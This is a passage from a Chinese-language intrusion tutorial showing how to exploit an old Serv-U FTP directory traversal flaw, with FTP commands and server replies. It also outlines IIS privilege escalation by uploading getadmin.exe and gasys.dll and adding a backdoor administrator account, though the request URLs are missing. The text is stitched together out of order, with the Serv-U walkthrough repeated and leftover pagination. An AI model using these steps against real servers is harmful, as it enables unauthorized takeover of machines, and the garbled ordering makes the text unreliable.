权限不足。
ftp>ls ..
200 PORT Command successful.
550 Permission denied.
解释:
没有权限查看上一级目录。
(2) 换种方式,输入如下命令格式:
ftp>ls .. ./*
注意:
命令格式中必须加上/*。
上一级目录(C:)中的东西尽收眼底了!
ftp>cd .. .
ftp>pwd
257 "/c:/ftproot/.." is current directory.
解释:
当前目录变成了c:ftproot..,即根目录。
这是由于.. 在这里相当于..;而且,在Serv-U分析这个目录的时候,把..当作当前目录下的子目录,而不是直接进入上一级目录。所以C盘根目录,也就是c:ftproot..被当作ftproot里面的子目录来操作。如果在Serv-U的设置中,c:ftproot被当作用户的主目录,用户可以对它和其子目录进行读和写的操作,而本来用户被禁止操作的其他目录,就可以通过这种方式当作当前目录的子目录而继承其属性,用户也可以对它读写了。假如当前在c:ftprootincoming目录,那么就可以用.. ./.. ./windows来表示c:ftproottest....windows,即c:windows目录,如果incoming目录对用户完全开放,可以进行读、写、删除、列表、建目录,那么用户也就可以对c:windows目录进行一些可怕的操作了。
经过证明 .. ..、.. ..、 .. .都等效于..。如果管理员不重视此漏洞的话,服务器就有可能被入侵都完全控制。
漏洞修补:升级Serv-U到2.5i以上的版本
[Page]
(3) 把WinNT下的cmd.exe复制到scripts文件夹下,把getadmin.exe和gasys.dll上传到scripts目录下,然后输入:
大约十多秒后屏幕显示:
CGI Error
这时已经把IUSR_54hack升级为Administrator,也就是任何访问该Web站的人都是
管理员。
(4) 添加用户,在浏览器中输入如下内容:
这样就创建了一个叫system32的用户,密码是:ffhh,然后提升权限输入如下内容:
(5) 入侵测试完成,完全控制目标计算机。 6.10.3 Serv-U入侵
Serv-U是一款很出色的FTP服务器软件,在网上的应用很广泛,其设置简单,小巧玲珑,很受用户喜爱。 但是在2000年12月3日Zoa_Chien (zoachien securax.org)发现了Serv-U的一个重大漏洞,这个漏洞使安装有Serv-U软件的服务器的硬盘暴露在网络上。这个漏洞在2.5i以前版本中全部存在,但是现在还有很多的网站仍然在使用2.5i以前的版本。下面就来看看入侵者是如何利用该漏洞的。
(1) 入侵者使用匿名进入一个使用Seru-U的2.5i以前版本FTP站点:
ftp>pwd
257 "/c:/ftproot" is current directory.
ftp>cd ..
550 /c:/: Permission denied.
解释:
权限不足。
ftp>ls ..
200 PORT Command successful.
550 Permission denied.
解释:
没有权限查看上一级目录。
(2) 换种方式,输入如下命令格式:
ftp>ls .. ./*
注意:
命令格式中必须加上/*。
上一级目录(C:)中的东西尽收眼底了!
ftp>cd .. .
ftp>pwd
257 "/c:/ftproot/.." is current directory.
解释:
当前目录变成了c:ftproot..,即根目录。
2/2 首页 上一页 1 2 |